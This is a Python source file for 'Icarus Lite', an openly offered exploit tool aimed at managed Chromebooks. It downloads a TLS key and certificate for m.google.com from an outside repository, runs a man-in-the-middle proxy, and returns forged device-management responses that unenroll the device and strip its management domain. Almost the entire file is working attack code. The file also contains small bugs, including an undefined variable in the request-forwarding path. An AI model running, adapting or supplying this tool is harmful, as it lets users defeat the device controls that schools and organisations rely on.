""" Icarus Lite v1.0 Written by cosmicdevv Description: Icarus Lite is a simple and lightweight version of the Icarus ChromeOS exploit initially written in NodeJS by Writable/Unretained/MunyDev. The goal of Icarus Lite is to simplify the codebase and make it easier to understand and modify. Icarus Lite is How Icarus/Icarus Lite work: ill write later lol """ import os import time import socket import ssl import shutil import threading import select import re import http.server import urllib.request import urllib.parse from dmbackend import device_management_pb2 pInitial = 3001 # The port that MiniServers will start up from. sslCerts = { "m.google.com.key": "https://git.kxtz.dev/kxtzownsu/httpmitm/raw/branch/main/configs/m.google.com/public/google.com.key", "m.google.com.pem": "https://git.kxtz.dev/kxtzownsu/httpmitm/raw/branch/main/configs/m.google.com/public/google.com.pem" } # Stores names and links of certificates to download certPaths = {} # Stores paths of certificates on the local filesystem # Custom function to print text with color to enhance user experience while reducing dependies (such as Colorama) that are needed def colorprint(text, color): if color == "blue": print(f"\033[34m{text}\033[0m") elif color == "green": print(f"\033[32m{text}\033[0m") elif color == "red": print(f"\033[31m{text}\033[0m") # unlike normal icarus which calls other files and shit to create a miniserver, we can do it easily in icarus Lite!!!!! class MiniServerHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args): pass # Since we have our own logging, we don't need the HTTP server to log requests it recieves def do_GET(self): colorprint("GET request recieved, ignoring.\n\n", "blue") self.send_response(200) self.wfile.write(b"OK") def do_POST(self): # Slightly rewritten part of dmbackend # Get the body content of the request from the client body = self.rfile.read(int(self.headers.get("Content-Length", 0))) # Create a dmr object dmr = device_management_pb2.DeviceManagementRequest() dmr.ParseFromString(body) # Declare status_code and resp which are used for the response later. status_code = 0 resp = None # all the magic originally by writable if (dmr.HasField("device_state_retrieval_request")): print("intercepting") status_code = 200 resp = device_management_pb2.DeviceManagementResponse() rr = resp.device_state_retrieval_response dv = device_management_pb2.DeviceInitialEnrollmentStateResponse() dv.Clear() dv = rr.initial_state_response dv.initial_enrollment_mode = 0 dv.management_domain = "" dv.is_license_packaged_with_device = False dv.disabled_state.message = "" rr.restore_mode = 0 rr.management_domain = "" else: req = urllib.request.Request("https://m.google.com/devicemanagement/data/api?" + urllib.parse.urlparse(self.path).query, data=data, headers=dict(self.headers), method="POST") with urllib.request.urlopen(req) as response: status_code = response.getcode() con = response.read().decode() resp = device_management_pb2.DeviceManagementResponse() resp.ParseFromString(con) # Send the response back to the client, which unenroll the device self.send_response(status_code) self.send_header("Content-Type", "application/x-protobuffer") self.send_header("Content-Length", str(len(resp.SerializeToString()))) self.end_headers() self.wfile.write(resp.SerializeToString()) class MiniServer: def __init__(self): # Create a mini HTTP/HTTPS server. global pInitial self.port = pInitial handler = MiniServerHandler handler.server = self # Keep trying to create the server in case some ports are already in use, in which case the code will increment the port and try again. while True: try: self.httpd = http.server.HTTPServer(("0.0.0.0", self.port), handler) break except OSError: pInitial += 1 self.port = pInitial continue context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) context.load_cert_chain(certfile=certPaths["pem"], keyfile=certPaths["key"]) self.httpd.socket = context.wrap_socket(self.httpd.socket, server_side=True) pInitial += 1 threading.Thread(target=self.httpd.serve_forever).start() # Start the server in a separate thread so it doesn't block the main thread. def handle_client(client_socket, address): # Initial request buffer colorprint("// HANDLING REQUEST \\\\\n", "blue") host = None port = 0 is_tls = False is_filtered = False request = b"" # Gets all the request data (we while loop this incase the request is larger than 1 packet, and the loop ends once the end of the request is reached) while b"\r\n\r\n" not in request: data = client_socket.recv(4096) # Recieve 1 packet with the buffer size of 4096 bytes request += data # Add the newly retrieved data to the stored request data # Split and decode the request data request_line = request.split(b"\r\n")[0].decode("utf-8") if request_line.startswith("CONNECT"): # CONNECT means it's a TLS request is_tls = True _, target, _ = request_line.split(" ", 2) host, port = target.split(":", 1) port = int(port) else: # If CONNECT isn't in the request_line, it's not a TLS request, and we handle it differently is_tls = False method, path, _ = request_line.split(" ", 2) # Get the host from the request data for line in request.split(b"\r\n")[1:]: if line.startswith(b"Host: "): host = line[6:].decode("utf-8") break # If a host isn't found, the request is probably malformed if not host: client_socket.close() return # If the host specifies a port to use, we'll retrieve it. if ":" in host: host, port = host.split(":", 1) port = int(port) # Ensure the host is an integer and not a string else: # If no port is specified, we'll use the default port for a non-TLS request (which is 80) port = 80 # Check if the host is filtered if re.match(r"m\.google\.com", host): is_filtered = True # Console logging colorprint("Server Address: " + str(host), "blue") colorprint("Is TLS (HTTPS) connection: " + str(is_tls), "green" if is_tls else "red") colorprint("Is filtered? " + str(is_filtered), "green" if is_filtered else "red") # If it's filtered and it's a TLS request, we'll have to send the request to our own server so we can intercept it if is_filtered and is_tls: # Create a new MiniServer, miniserver = MiniServer() # Create a server socket to communicate with the Miniserver miniserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) miniserver_socket.connect(("127.0.0.1", miniserver.port)) # Acknowledge the request, then pipe the client to the MiniServer client_socket.sendall(b"HTTP/1.1 200 Connection Established\r\n\r\n") try: tunnel_traffic(client_socket, miniserver_socket) except Exception as e: colorprint(f"ERROR: {e}\nThe client may have rejected the connection.", "red") colorprint("Have you ran the Icarus shim on the target Chromebook?", "blue") return # The below only runs if the host isn't filtered (or it is filtered but not a TLS request, in which case we won't intercept it) try: # Create a connection to the host server server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.connect((host, port)) if is_tls: # If it's a TLS request, we'll acknowledge the request so the tunnel between the client and server can be established shortly client_socket.sendall(b"HTTP/1.1 200 Connection Established\r\n\r\n") else: # If it's not a TLS request, we'll forward all the data from the client to the server server_socket.sendall(request) # Same as .pipe() in NodeJS but we have to do it a bit differently. try: tunnel_traffic(client_socket, server_socket) except Exception as e: colorprint(f"ERROR: {e}\nUnknown failure tunneling traffic.", "red") except Exception as e: colorprint(f"Error connecting to {host}:{port} - {e}", "red") client_socket.close() return print("\n\n") # New lines for next request def tunnel_traffic(client_socket, server_socket): # Because Python does not have a built-in .pipe() method like NodeJS, we have to do this manually. client_socket.setblocking(0) server_socket.setblocking(0) while True: readable, _, exceptional = select.select([client_socket, server_socket], [], [client_socket, server_socket], 60) if exceptional: break for sock in readable: peer_sock = server_socket if sock is client_socket else client_socket # normally we'd put a try catch exception here but i want it to raise an error when there is one data = sock.recv(4096) if not data: # Socket closed return peer_sock.sendall(data) client_socket.close() server_socket.close() colorprint("Icarus Lite v1.0", "blue") colorprint("Written by cosmicdevv", "blue") colorprint("Checking installation...", "blue") # Check if the Icarus folder exists firstTime = False if not os.path.exists("Icarus Lite"): firstTime = True colorprint("! WARNING !\nIcarus Lite is not set up in the local directory. Do you want to automatically set up? (Y/N)", "blue") # Ask the user if they want to create the Icarus folder, loop to ensure valid input while True: choice = input().lower() if choice in ["y", "yes"]: break elif choice in ["n", "no"]: colorprint("Icarus Lite will not set up due to user choice.", "red") exit() # If they selected yes, create necessary folders colorprint("Creating install folder...", "blue") os.mkdir("Icarus Lite") colorprint("Creating certificate folder...", "blue") os.mkdir("Icarus Lite/autocerts") colorprint("Creating manual certificate folder...", "blue") os.mkdir("Icarus Lite/manualcerts") colorprint("Creating dmbackend folder...", "blue") os.mkdir("Icarus Lite/dmbackend") colorprint("Downloading latest Icarus SSL certificates...", "blue") success = True # If a download fails, this gets set to false # Loop through all the necessary SSL certificates, where their filename is the key and the download url is the value for sslCert in sslCerts: try: # Try to download the certificate from the url and place it in the autocerts folder urllib.request.urlretrieve(sslCerts[sslCert], f"Icarus Lite/autocerts/{sslCert}") if firstTime: # Create a backup copy of the certificate in the manualcerts folder shutil.copy(f"Icarus Lite/autocerts/{sslCert}", f"Icarus Lite/manualcerts/{sslCert}") colorprint(f"Latest '{sslCert}' downloaded.", "green") except Exception as e: # If the download fails success = False colorprint(f"'{sslCert}' failed to download.", "red") # If not all downloads were successful, run this if not success: colorprint("One or more certificates could not be downloaded. Checking ability to run...", "red") # Check if the required certs were downloaded (in case we put other files in the download list for some reason) if not os.path.exists("Icarus Lite/autocerts/m.google.com.key") or not os.path.exists(f"Icarus Lite/autocerts/m.google.com.pem"): colorprint("Icarus Lite is unable to run from auto-downloaded certificates.", "blue") messageDisplayed = False # Loop until certificates are manually added to the manualcerts folder (we use a different folder for manual certs so if a user puts certs in a folder, they aren't overwritten by the autodownloads unless it's a fresh setup) while True: if os.path.exists("Icarus Lite/manualcerts/m.google.com.key") and os.path.exists(f"Icarus Lite/manualcerts/m.google.com.key"): colorprint("Manual certificates found. Using manual certificates for Icarus Lite.", "green") # Set the certificate paths to the manualcerts path certPaths["key"] = "Icarus Lite/manualcerts/m.google.com.key" certPaths["pem"] = "Icarus Lite/manualcerts/m.google.com.pem" break # If the user doesn't have certs in manualcerts on first check, prompt them to put them in. if messageDisplayed == False: colorprint("Please manually download the certificates and place them in:\nIcarus Lite/manualcerts/\nWaiting for certificates...", "blue") messageDisplayed = True # Ensure the message isn't displayed every loop iteration # small delay time.sleep(1) else: # If the required certs were auto-downloaded, we'll use them certPaths["key"] = "Icarus Lite/autocerts/m.google.com.key" certPaths["pem"] = "Icarus Lite/autocerts/m.google.com.pem" else: # If all downloads were successful, we'll use the downloaded certs certPaths["key"] = "Icarus Lite/autocerts/m.google.com.key" certPaths["pem"] = "Icarus Lite/autocerts/m.google.com.pem" port = 8080 proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) proxy_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) proxy_socket.bind(("0.0.0.0", port)) proxy_socket.listen(100) # Get the local IP for the user s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 1)) local_ip = s.getsockname()[0] s.close() # aaaaaaaaaaaaaaaaaaaaaa print("\n\n\n") colorprint(f"Icarus Lite is running on: {local_ip}:{port}", "blue") while True: try: client_socket, client_address = proxy_socket.accept() client_thread = threading.Thread(target=handle_client, args=(client_socket, client_address)) client_thread.daemon = True client_thread.start() except KeyboardInterrupt: print("Icarus Lite is shutting down...") proxy_socket.close() break except Exception as e: print(f"Error accepting connection: {e}") proxy_socket.close()